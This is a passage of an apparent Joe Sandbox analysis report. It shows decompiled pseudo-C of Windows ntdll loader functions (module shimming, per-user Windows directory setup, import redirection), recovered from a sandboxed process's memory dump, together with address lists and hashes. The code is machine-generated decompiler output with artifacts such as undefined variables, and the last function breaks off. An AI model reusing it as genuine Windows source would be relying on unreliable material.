                                                                                                                              0x00000000
                                                                                                                              0x1d7aa85f
                                                                                                                              0x1d7aa7f0
                                                                                                                              0x1d7aa7f2
                                                                                                                              0x1d7aa7f2
                                                                                                                              0x1d7aa7f5
                                                                                                                              0x1d7aa7f5
                                                                                                                              0x1d7aa7f8
                                                                                                                              0x1d7aa7fb
                                                                                                                              0x1d7aa808
                                                                                                                              0x1d7aa808
                                                                                                                              0x1d7aa812
                                                                                                                              0x1d7aa817
                                                                                                                              0x1d7aa81f
                                                                                                                              0x1d7aa825
                                                                                                                              0x1d7aa826
                                                                                                                              0x1d7aa82d
                                                                                                                              0x1d7aa82f
                                                                                                                              0x1d7aa83b
                                                                                                                              0x1d7aa83d
                                                                                                                              0x1d7aa849
                                                                                                                              0x1d7aa850
                                                                                                                              0x1d7aa850
                                                                                                                              0x1d7aa849
                                                                                                                              0x1d7aa855
                                                                                                                              0x1d7aa85a
                                                                                                                              0x00000000
                                                                                                                              0x1d7aa85a
                                                                                                                              0x1d7aa795
                                                                                                                              0x1d7aa79c
                                                                                                                              0x1d7aa7b4
                                                                                                                              0x1d7aa7b9
                                                                                                                              0x1d7aa7be
                                                                                                                              0x1d7aa7c3
                                                                                                                              0x1d7aa7c5
                                                                                                                              0x1d7aa7c5
                                                                                                                              0x1d7aa7c6
                                                                                                                              0x1d7aa7c6
                                                                                                                              0x00000000

                                                                                                                              Strings
                                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1D7AA79F
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 1D7AA7AF
                                                                                                                              • LdrpDynamicShimModule, xrefs: 1D7AA7A5
                                                                                                                              • apphelp.dll, xrefs: 1D762382
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-176724104
                                                                                                                              • Opcode ID: 70fe984ae615b9ca79696ecc28cce2367f5b25f6d82f12e0c04eaee5fa63a72d
                                                                                                                              • Instruction ID: d551fa8fc72a78ebda4435db2c20001c2ad300b8c0ac068ab7bc2f12bdf251a8
                                                                                                                              • Opcode Fuzzy Hash: 70fe984ae615b9ca79696ecc28cce2367f5b25f6d82f12e0c04eaee5fa63a72d
                                                                                                                              • Instruction Fuzzy Hash: 9D316C79900151FFD701AF59C8C4B6B77B4FB88B74F19492AE9086B352D770D841CB52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D760AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 56%
                                                                                                                              			E1D760AEB(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t67;
				signed int _t70;
				signed int _t76;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t84;
				intOrPtr _t89;
				signed int _t90;
				intOrPtr _t93;
				signed char _t101;
				intOrPtr _t104;
				void* _t108;
				void* _t111;
				signed int _t113;
				intOrPtr* _t117;
				signed int _t119;
				intOrPtr* _t120;
				signed int _t121;
				intOrPtr* _t122;
				signed int _t126;
				void* _t130;
				void* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t135;
				intOrPtr _t136;
				signed int _t137;
				signed int _t138;
				void* _t139;
				void* _t140;
				void* _t141;

				_t134 = 0;
				_t108 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t141 =  *0x1d8368d8 - _t134; // 0x0
				if(_t141 != 0) {
					_v20 = 1;
				}
				if( *0x1d8365f9 == 0) {
					_t136 =  *((intOrPtr*)(_t108 + 4));
					while(1) {
						__eflags = _t136 - _t108;
						if(_t136 == _t108) {
							break;
						}
						_t110 = _t136 - 0x54;
						E1D777550(_t136 - 0x54);
						_t136 =  *((intOrPtr*)(_t136 + 4));
					}
					goto L2;
				} else {
					L2:
					_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
					E1D74FED0(0x1d8332d8);
					if( *0x1d8365f0 != 0) {
						_t126 =  *0x7ffe0330;
						_t135 =  *0x1d839218; // 0x0
						_t111 = 0x20;
						_t110 = _t111 - (_t126 & 0x0000001f);
						asm("ror edi, cl");
						_t134 = _t135 ^ _t126;
					}
					_t137 = 0;
					_t67 =  *((intOrPtr*)(_t108 + 4));
					_v36 = 0;
					_v32 = _t67;
					if(_t67 == _t108) {
						L11:
						_push(0x1d8332d8);
						E1D74E740(_t110);
						return _t137;
					} else {
						_t113 = _v16 & 0x00000100;
						_v16 = _t113;
						do {
							_t138 = _t67 - 0x54;
							if(_t113 != 0) {
								_t110 = _t138;
								_t70 = E1D736DA6(_t138);
								_v36 = _t70;
								__eflags = _t70;
								if(_t70 < 0) {
									break;
								}
							}
							_t114 = _t138;
							E1D7498DE(_t138, 0);
							if(_t134 != 0) {
								__eflags =  *0x1d8365f8;
								if(__eflags == 0) {
									_t114 = _t134;
									 *0x1d8391e0(_t138);
									 *_t134();
									 *(_t138 + 0x35) =  *(_t138 + 0x35) | 0x00000008;
								}
							}
							_t148 = _v20;
							if(_v20 == 0) {
								_t76 =  *(_t138 + 0x28);
								_t114 = _t76;
								_t130 = 0x10;
								_v8 = _t76;
								if(E1D761C7D(_t76, _t130, _t148) != 0) {
									_t117 = _v8;
									_t31 = _t117 + 2; // 0x2
									_t131 = _t31;
									do {
										_t78 =  *_t117;
										_t117 = _t117 + 2;
										__eflags = _t78 - _v12;
									} while (_t78 != _v12);
									_t114 = _t117 - _t131 >> 1;
									__eflags =  *0x1d8368d8;
									if( *0x1d8368d8 == 0) {
										_t33 = _t114 + 2; // 0x0
										_t79 = _t33;
									} else {
										_t104 =  *0x1d835d4c; // 0x0
										_t79 = _t104 + 1 + _t114;
									}
									_v28 = _t79;
									_t132 = E1D755D90(_t114,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t79 + _t79);
									_v24 = _t132;
									__eflags = _t132;
									if(_t132 != 0) {
										_t119 =  *0x1d8368d8; // 0x0
										__eflags = _t119;
										if(_t119 == 0) {
											_t120 = _v8;
											_t52 = _t120 + 2; // 0x2
											_v40 = _t52;
											do {
												_t84 =  *_t120;
												_t120 = _t120 + 2;
												__eflags = _t84 - _v12;
											} while (_t84 != _v12);
											_t121 = _t120 - _v40;
											__eflags = _t121;
											_t114 = _t121 >> 1;
											E1D7888C0(_t132, _v8, (_t121 >> 1) + (_t121 >> 1));
											_t139 = _t139 + 0xc;
											L39:
											 *0x1d8368d8 = _v24;
											 *0x1d835d4c = _v28;
											goto L9;
										}
										_t89 =  *0x1d835d4c; // 0x0
										_t90 = _t89 + _t89;
										__eflags = _t90;
										_v40 = _t90;
										E1D7888C0(_t132, _t119, _t90);
										_t133 = _v8;
										_t140 = _t139 + 0xc;
										_t122 = _v8;
										_t43 = _t122 + 2; // 0x2
										_v8 = _t43;
										do {
											_t93 =  *_t122;
											_t122 = _t122 + 2;
											__eflags = _t93 - _v12;
										} while (_t93 != _v12);
										_t114 = _v40 + 2;
										E1D7888C0(_v24 + _v40 + 2, _t133, (_t122 - _v8 >> 1) + (_t122 - _v8 >> 1));
										_t139 = _t140 + 0xc;
										E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x1d8368d8);
										goto L39;
									} else {
										_t101 =  *0x1d8337c0; // 0x0
										__eflags = _t101 & 0x00000003;
										if((_t101 & 0x00000003) != 0) {
											_push("Failed to allocated memory for shimmed module list\n");
											__eflags = 0;
											_push(0);
											_push("LdrpCheckModule");
											_push(0xaf4);
											_push("minkernel\\ntdll\\ldrinit.c");
											E1D7BE692();
											_t101 =  *0x1d8337c0; // 0x0
											_t139 = _t139 + 0x14;
										}
										__eflags = _t101 & 0x00000010;
										if((_t101 & 0x00000010) != 0) {
											asm("int3");
										}
										goto L9;
									}
								}
							}
							L9:
							E1D760C2C(_t138, 1, _t114);
							 *(_t138 + 0x34) =  *(_t138 + 0x34) | 0x00000008;
							E1D75DF36( *((intOrPtr*)(_t138 + 0x18)), _t138 + 0x24, 0x14ad);
							_t113 = _v16;
							_t67 =  *((intOrPtr*)(_v32 + 4));
							_v32 = _t67;
						} while (_t67 != _t108);
						_t137 = _v36;
						goto L11;
					}
				}
			}











































                                                                                                                              0x1d760af6
                                                                                                                              0x1d760af8
                                                                                                                              0x1d760afa
                                                                                                                              0x1d760afd
                                                                                                                              0x1d760b00
                                                                                                                              0x1d760b06
                                                                                                                              0x1d7a9ea5
                                                                                                                              0x1d7a9ea5
                                                                                                                              0x1d760b13
                                                                                                                              0x1d760bd3
                                                                                                                              0x1d760be3
                                                                                                                              0x1d760be3
                                                                                                                              0x1d760be5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d760bd8
                                                                                                                              0x1d760bdb
                                                                                                                              0x1d760be0
                                                                                                                              0x1d760be0
                                                                                                                              0x00000000
                                                                                                                              0x1d760b19
                                                                                                                              0x1d760b19
                                                                                                                              0x1d760b27
                                                                                                                              0x1d760b2a
                                                                                                                              0x1d760b36
                                                                                                                              0x1d760c0d
                                                                                                                              0x1d760c15
                                                                                                                              0x1d760c20
                                                                                                                              0x1d760c21
                                                                                                                              0x1d760c23
                                                                                                                              0x1d760c25
                                                                                                                              0x1d760c25
                                                                                                                              0x1d760b3e
                                                                                                                              0x1d760b40
                                                                                                                              0x1d760b43
                                                                                                                              0x1d760b46
                                                                                                                              0x1d760b4b
                                                                                                                              0x1d760bc2
                                                                                                                              0x1d760bc2
                                                                                                                              0x1d760bc7
                                                                                                                              0x1d760bd2
                                                                                                                              0x1d760b4d
                                                                                                                              0x1d760b50
                                                                                                                              0x1d760b56
                                                                                                                              0x1d760b59
                                                                                                                              0x1d760b59
                                                                                                                              0x1d760b5e
                                                                                                                              0x1d7a9eb1
                                                                                                                              0x1d7a9eb3
                                                                                                                              0x1d7a9eb8
                                                                                                                              0x1d7a9ebb
                                                                                                                              0x1d7a9ebd
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a9ec3
                                                                                                                              0x1d760b66
                                                                                                                              0x1d760b69
                                                                                                                              0x1d760b70
                                                                                                                              0x1d760bec
                                                                                                                              0x1d760bf3
                                                                                                                              0x1d760bfa
                                                                                                                              0x1d760bfc
                                                                                                                              0x1d760c02
                                                                                                                              0x1d760c04
                                                                                                                              0x1d760c04
                                                                                                                              0x1d760bf3
                                                                                                                              0x1d760b72
                                                                                                                              0x1d760b76
                                                                                                                              0x1d760b78
                                                                                                                              0x1d760b7b
                                                                                                                              0x1d760b7f
                                                                                                                              0x1d760b80
                                                                                                                              0x1d760b8a
                                                                                                                              0x1d7a9ec8
                                                                                                                              0x1d7a9ecb
                                                                                                                              0x1d7a9ecb
                                                                                                                              0x1d7a9ece
                                                                                                                              0x1d7a9ece
                                                                                                                              0x1d7a9ed1
                                                                                                                              0x1d7a9ed4
                                                                                                                              0x1d7a9ed4
                                                                                                                              0x1d7a9edc
                                                                                                                              0x1d7a9ede
                                                                                                                              0x1d7a9ee5
                                                                                                                              0x1d7a9ef1
                                                                                                                              0x1d7a9ef1
                                                                                                                              0x1d7a9ee7
                                                                                                                              0x1d7a9ee7
                                                                                                                              0x1d7a9eed
                                                                                                                              0x1d7a9eed
                                                                                                                              0x1d7a9ef4
                                                                                                                              0x1d7a9f0a
                                                                                                                              0x1d7a9f0c
                                                                                                                              0x1d7a9f0f
                                                                                                                              0x1d7a9f11
                                                                                                                              0x1d7a9f4e
                                                                                                                              0x1d7a9f54
                                                                                                                              0x1d7a9f56
                                                                                                                              0x1d7a9fbb
                                                                                                                              0x1d7a9fbe
                                                                                                                              0x1d7a9fc1
                                                                                                                              0x1d7a9fc4
                                                                                                                              0x1d7a9fc4
                                                                                                                              0x1d7a9fc7
                                                                                                                              0x1d7a9fca
                                                                                                                              0x1d7a9fca
                                                                                                                              0x1d7a9fd0
                                                                                                                              0x1d7a9fd0
                                                                                                                              0x1d7a9fd3
                                                                                                                              0x1d7a9fdd
                                                                                                                              0x1d7a9fe2
                                                                                                                              0x1d7a9fe5
                                                                                                                              0x1d7a9fe8
                                                                                                                              0x1d7a9ff0
                                                                                                                              0x00000000
                                                                                                                              0x1d7a9ff0
                                                                                                                              0x1d7a9f58
                                                                                                                              0x1d7a9f5d
                                                                                                                              0x1d7a9f5d
                                                                                                                              0x1d7a9f62
                                                                                                                              0x1d7a9f65
                                                                                                                              0x1d7a9f6a
                                                                                                                              0x1d7a9f6d
                                                                                                                              0x1d7a9f70
                                                                                                                              0x1d7a9f72
                                                                                                                              0x1d7a9f75
                                                                                                                              0x1d7a9f78
                                                                                                                              0x1d7a9f78
                                                                                                                              0x1d7a9f7b
                                                                                                                              0x1d7a9f7e
                                                                                                                              0x1d7a9f7e
                                                                                                                              0x1d7a9f93
                                                                                                                              0x1d7a9f9a
                                                                                                                              0x1d7a9f9f
                                                                                                                              0x1d7a9fb4
                                                                                                                              0x00000000
                                                                                                                              0x1d7a9f13
                                                                                                                              0x1d7a9f13
                                                                                                                              0x1d7a9f18
                                                                                                                              0x1d7a9f1a
                                                                                                                              0x1d7a9f1c
                                                                                                                              0x1d7a9f21
                                                                                                                              0x1d7a9f23
                                                                                                                              0x1d7a9f24
                                                                                                                              0x1d7a9f29
                                                                                                                              0x1d7a9f2e
                                                                                                                              0x1d7a9f33
                                                                                                                              0x1d7a9f38
                                                                                                                              0x1d7a9f3d
                                                                                                                              0x1d7a9f3d
                                                                                                                              0x1d7a9f40
                                                                                                                              0x1d7a9f42
                                                                                                                              0x1d7a9f48
                                                                                                                              0x1d7a9f48
                                                                                                                              0x00000000
                                                                                                                              0x1d7a9f42
                                                                                                                              0x1d7a9f11
                                                                                                                              0x1d760b8a
                                                                                                                              0x1d760b90
                                                                                                                              0x1d760b96
                                                                                                                              0x1d760ba1
                                                                                                                              0x1d760baa
                                                                                                                              0x1d760bb2
                                                                                                                              0x1d760bb5
                                                                                                                              0x1d760bb8
                                                                                                                              0x1d760bbb
                                                                                                                              0x1d760bbf
                                                                                                                              0x00000000
                                                                                                                              0x1d760bbf
                                                                                                                              0x1d760b4b

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 1D7A9F1C
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 1D7A9F2E
                                                                                                                              • LdrpCheckModule, xrefs: 1D7A9F24
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 3446177414-161242083
                                                                                                                              • Opcode ID: c58b04b893ac50b2e44a51f5ff4f02d976ddaa369bb4596ed2e8c28433c25d31
                                                                                                                              • Instruction ID: f222870a360d3424f8b37224591f7cb250fa5fd76ee6a2f0c7a2977578387daf
                                                                                                                              • Opcode Fuzzy Hash: c58b04b893ac50b2e44a51f5ff4f02d976ddaa369bb4596ed2e8c28433c25d31
                                                                                                                              • Instruction Fuzzy Hash: 9171F379A002559FDB05CF68C884BBEB7F0FB48628F14896ED909A7251E734ED41CB62
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D77C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 54%
                                                                                                                              			E1D77C640(void* __ebx, signed int __ecx, void* __edx, void* __edi) {
				signed int _v20;
				signed int _v36;
				char _v544;
				char _v552;
				char _v556;
				char* _v560;
				short _v562;
				signed int _v564;
				short _v570;
				char _v572;
				signed int _v580;
				char _v588;
				signed int _v604;
				signed short _v608;
				void* __esi;
				void* __ebp;
				void* _t25;
				signed int* _t27;
				signed int _t39;
				signed int _t42;
				signed int _t54;
				signed char _t56;
				signed int* _t58;
				intOrPtr* _t65;
				signed int _t67;
				void* _t70;
				signed int _t72;
				signed int _t75;
				void* _t77;
				signed int _t80;
				void* _t82;
				signed int _t85;
				signed int _t87;

				_t70 = __edx;
				_push(__ebx);
				_push(__edi);
				_t72 = __ecx;
				_t25 = E1D760130();
				if(_t25 != 0) {
					L1D752330(_t25, 0x1d835b5c);
					_t27 =  *0x1d839224; // 0x0
					_t75 =  *_t27;
					__eflags = _t72;
					if(_t72 != 0) {
						__eflags = _t75;
						if(_t75 == 0) {
							goto L13;
						} else {
							_t80 = _t75 - 1;
							goto L7;
						}
					} else {
						__eflags = _t75;
						if(_t75 == 0) {
							E1D739050( *0x1d83921c, _t75);
						}
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							L13:
							E1D7524D0(0x1d835b5c);
							_t65 = 0xe;
							asm("int 0x29");
							_t87 = (_t85 & 0xfffffff8) - 0x224;
							_v20 =  *0x1d83b370 ^ _t87;
							_t76 = _t65;
							 *0x1d8391e0( &_v544, 0x104, _t75, _t82);
							_t67 =  *_t65() + _t33;
							__eflags = _t67;
							if(_t67 != 0) {
								__eflags =  *0x1d83660c;
								_v560 =  &_v552;
								_v564 = _t67;
								_v562 = 0x208;
								if(__eflags == 0) {
									L25:
									_push( &_v556);
									_push( &_v564);
									E1D7CCB20(0x1d835b5c, _t72, _t76, __eflags);
									goto L15;
								} else {
									_t76 = ( *0x1d836608 & 0x0000ffff) + 2 + _t67;
									_t42 = E1D755D90(_t67,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t76);
									_v580 = _t42;
									__eflags = _t42;
									if(_t42 != 0) {
										__eflags = 0;
										_v570 = _t76;
										_v572 = 0;
										E1D7610D0(_t67,  &_v572, 0x1d836608);
										E1D7610D0(_t67,  &_v580,  &_v572);
										E1D74FE40(_t67,  &_v588, ";");
										E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x1d83660c);
										 *0x1d836608 = _v608;
										_t54 = _v604;
										 *0x1d83660c = _t54;
										 *0x1d836604 = _t54;
										E1D7CD4A0(_t67, __eflags);
										goto L25;
									} else {
										_t56 =  *0x1d8337c0; // 0x0
										__eflags = _t56 & 0x00000003;
										if((_t56 & 0x00000003) != 0) {
											_push("Failed to reallocate the system dirs string !\n");
											_push(0);
											_push("LdrpInitializePerUserWindowsDirectory");
											_push(0xcf4);
											_push("minkernel\\ntdll\\ldrinit.c");
											E1D7BE692();
											_t56 =  *0x1d8337c0; // 0x0
											_t87 = _t87 + 0x14;
										}
										__eflags = _t56 & 0x00000010;
										if((_t56 & 0x00000010) != 0) {
											asm("int3");
										}
										_t39 = 0xc0000017;
									}
								}
							} else {
								L15:
								_t39 = 0;
								__eflags = 0;
							}
							_pop(_t77);
							__eflags = _v36 ^ _t87;
							return E1D784B50(_t39, 0x1d835b5c, _v36 ^ _t87, _t70, _t72, _t77);
						} else {
							_t80 = _t75 + 1;
							__eflags = _t80;
							L7:
							_t58 =  *0x1d839224; // 0x0
							 *_t58 = _t80;
							__eflags = _t72;
							if(_t72 != 0) {
								__eflags = _t80;
								if(_t80 == 0) {
									E1D739050( *0x1d83921c, 1);
								}
							}
							_t25 = E1D7524D0(0x1d835b5c);
							goto L1;
						}
					}
				} else {
					L1:
					return _t25;
				}
			}




































                                                                                                                              0x1d77c640
                                                                                                                              0x1d77c642
                                                                                                                              0x1d77c644
                                                                                                                              0x1d77c645
                                                                                                                              0x1d77c647
                                                                                                                              0x1d77c64e
                                                                                                                              0x1d77c65a
                                                                                                                              0x1d77c65f
                                                                                                                              0x1d77c664
                                                                                                                              0x1d77c666
                                                                                                                              0x1d77c668
                                                                                                                              0x1d77c6a4
                                                                                                                              0x1d77c6a6
                                                                                                                              0x00000000
                                                                                                                              0x1d77c6a8
                                                                                                                              0x1d77c6a8
                                                                                                                              0x00000000
                                                                                                                              0x1d77c6a8
                                                                                                                              0x1d77c66a
                                                                                                                              0x1d77c66a
                                                                                                                              0x1d77c66c
                                                                                                                              0x1d77c675
                                                                                                                              0x1d77c675
                                                                                                                              0x1d77c67a
                                                                                                                              0x1d77c67d
                                                                                                                              0x1d77c6ab
                                                                                                                              0x1d77c6ac
                                                                                                                              0x1d77c6b3
                                                                                                                              0x1d77c6b4
                                                                                                                              0x1d77c6be
                                                                                                                              0x1d77c6cb
                                                                                                                              0x1d77c6dc
                                                                                                                              0x1d77c6df
                                                                                                                              0x1d77c6e9
                                                                                                                              0x1d77c6e9
                                                                                                                              0x1d77c6eb
                                                                                                                              0x1d7b8090
                                                                                                                              0x1d7b809b
                                                                                                                              0x1d7b80a4
                                                                                                                              0x1d7b80a9
                                                                                                                              0x1d7b80ae
                                                                                                                              0x1d7b817f
                                                                                                                              0x1d7b8183
                                                                                                                              0x1d7b8188
                                                                                                                              0x1d7b8189
                                                                                                                              0x00000000
                                                                                                                              0x1d7b80b4
                                                                                                                              0x1d7b80c4
                                                                                                                              0x1d7b80cc
                                                                                                                              0x1d7b80d1
                                                                                                                              0x1d7b80d5
                                                                                                                              0x1d7b80d7
                                                                                                                              0x1d7b8114
                                                                                                                              0x1d7b8116
                                                                                                                              0x1d7b811b
                                                                                                                              0x1d7b812a
                                                                                                                              0x1d7b8139
                                                                                                                              0x1d7b8148
                                                                                                                              0x1d7b815e
                                                                                                                              0x1d7b8167
                                                                                                                              0x1d7b816c
                                                                                                                              0x1d7b8170
                                                                                                                              0x1d7b8175
                                                                                                                              0x1d7b817a
                                                                                                                              0x00000000
                                                                                                                              0x1d7b80d9
                                                                                                                              0x1d7b80d9
                                                                                                                              0x1d7b80de
                                                                                                                              0x1d7b80e0
                                                                                                                              0x1d7b80e2
                                                                                                                              0x1d7b80e7
                                                                                                                              0x1d7b80e9
                                                                                                                              0x1d7b80ee
                                                                                                                              0x1d7b80f3
                                                                                                                              0x1d7b80f8
                                                                                                                              0x1d7b80fd
                                                                                                                              0x1d7b8102
                                                                                                                              0x1d7b8102
                                                                                                                              0x1d7b8105
                                                                                                                              0x1d7b8107
                                                                                                                              0x1d7b8109
                                                                                                                              0x1d7b8109
                                                                                                                              0x1d7b810a
                                                                                                                              0x1d7b810a
                                                                                                                              0x1d7b80d7
                                                                                                                              0x1d77c6f1
                                                                                                                              0x1d77c6f1
                                                                                                                              0x1d77c6f1
                                                                                                                              0x1d77c6f1
                                                                                                                              0x1d77c6f1
                                                                                                                              0x1d77c6fa
                                                                                                                              0x1d77c6fb
                                                                                                                              0x1d77c705
                                                                                                                              0x1d77c67f
                                                                                                                              0x1d77c67f
                                                                                                                              0x1d77c67f
                                                                                                                              0x1d77c680
                                                                                                                              0x1d77c680
                                                                                                                              0x1d77c685
                                                                                                                              0x1d77c687
                                                                                                                              0x1d77c689
                                                                                                                              0x1d77c68b
                                                                                                                              0x1d77c68d
                                                                                                                              0x1d77c697
                                                                                                                              0x1d77c697
                                                                                                                              0x1d77c68d
                                                                                                                              0x1d77c69d
                                                                                                                              0x00000000
                                                                                                                              0x1d77c69d
                                                                                                                              0x1d77c67d
                                                                                                                              0x1d77c650
                                                                                                                              0x1d77c650
                                                                                                                              0x1d77c653
                                                                                                                              0x1d77c653

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 1D7B80E9
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 1D7B80F3
                                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 1D7B80E2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 3446177414-1783798831
                                                                                                                              • Opcode ID: 966d99bd2fb0ab2fdc77540df5a01407f12277a3c732b49e27bea5c025e2e102
                                                                                                                              • Instruction ID: 43cb64b110e0cac5ebf2c66207861a52d7eca1db7f36b4f74b2c4a5c568d1f73
                                                                                                                              • Opcode Fuzzy Hash: 966d99bd2fb0ab2fdc77540df5a01407f12277a3c732b49e27bea5c025e2e102
                                                                                                                              • Instruction Fuzzy Hash: 2041A379508351BBC711DB24DC89B6B77E8BB486A4F015D2AF95CD7262E734E800CB93
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7C43D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 50%
                                                                                                                              			E1D7C43D5(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __esi;
				signed char _t37;
				signed int _t41;
				intOrPtr _t44;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				void* _t54;
				signed int _t59;
				signed int _t60;
				signed int _t64;
				signed int _t66;
				intOrPtr _t68;
				signed int _t69;
				intOrPtr _t70;

				_t68 = _a4;
				_t54 = __edx;
				_v28 = __ecx;
				_v24 = E1D7C4B46(_t68);
				_v12 =  *((intOrPtr*)(_t54 + 0x2c));
				_v8 =  *((intOrPtr*)(_t54 + 0x30));
				_v20 =  *((intOrPtr*)(_t54 + 0x90));
				_t37 =  *0x1d836714; // 0x0
				_v16 = _t68;
				_t69 =  *0x1d836710; // 0x0
				if((_t37 & 0x00000001) != 0) {
					if(_t69 == 0) {
						_t69 = 0;
						__eflags = 0;
					} else {
						_t69 = _t69 ^ 0x1d836710;
					}
				}
				_t64 = _t37 & 1;
				while(_t69 != 0) {
					__eflags = E1D7C4528(_t54, _t69,  &_v24, _t69);
					if(__eflags >= 0) {
						if(__eflags <= 0) {
							L25:
							while(_t69 != 0) {
								_t41 = E1D7C4528(_t54, _t69,  &_v24, _t69);
								__eflags = _t41;
								if(_t41 != 0) {
									break;
								}
								_t66 =  *0x1d835ca0; // 0x0
								__eflags = _t66;
								if(_t66 == 0) {
									L28:
									__eflags =  *0x1d8337c0 & 0x00000005;
									_t70 =  *((intOrPtr*)(_t69 + 0x20));
									if(( *0x1d8337c0 & 0x00000005) != 0) {
										_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
										_push( *((intOrPtr*)(_t44 + 0x2a8)));
										_push( *((intOrPtr*)(_t44 + 0x2a4)));
										_push(_a4);
										_push( *((intOrPtr*)(_t54 + 0x30)));
										_push( *((intOrPtr*)(_t54 + 0x2c)));
										_push( *((intOrPtr*)(_v28 + 0x30)));
										E1D7BE692("minkernel\\ntdll\\ldrredirect.c", 0x12b, "LdrpCheckRedirection", 2, "Import Redirection: %wZ %wZ!%s redirected to %wZ\n",  *((intOrPtr*)(_v28 + 0x2c)));
									}
									L27:
									return _t70;
								}
								 *0x1d8391e0( *((intOrPtr*)(_v28 + 0x28)),  *((intOrPtr*)(_t69 + 0x24)));
								_t49 =  *_t66();
								__eflags = _t49;
								if(_t49 != 0) {
									goto L28;
								}
								_t50 =  *(_t69 + 4);
								_t59 = _t69;
								__eflags = _t50;
								if(_t50 == 0) {
									while(1) {
										_t69 =  *(_t69 + 8) & 0xfffffffc;
										__eflags = _t69;
										if(_t69 == 0) {
											goto L25;
										}
										__eflags =  *_t69 - _t59;
										if( *_t69 == _t59) {
											goto L25;
										}
										_t59 = _t69;
									}
									continue;
								}
								_t69 = _t50;
								_t60 =  *_t69;
								__eflags = _t60;
								if(_t60 == 0) {
									continue;
								} else {
									goto L20;
								}
								do {
									L20:
									_t51 =  *_t60;
									_t69 = _t60;
									_t60 = _t51;
									__eflags = _t51;
								} while (_t51 != 0);
							}
							_t70 = 0xffbadd11;
							goto L27;
						}
						_t52 =  *(_t69 + 4);
						L9:
						__eflags = _t64;
						if(_t64 == 0) {
							L12:
							_t69 = _t52;
							continue;
						}
						__eflags = _t52;
						if(_t52 == 0) {
							goto L12;
						}
						_t69 = _t69 ^ _t52;
						continue;
					}
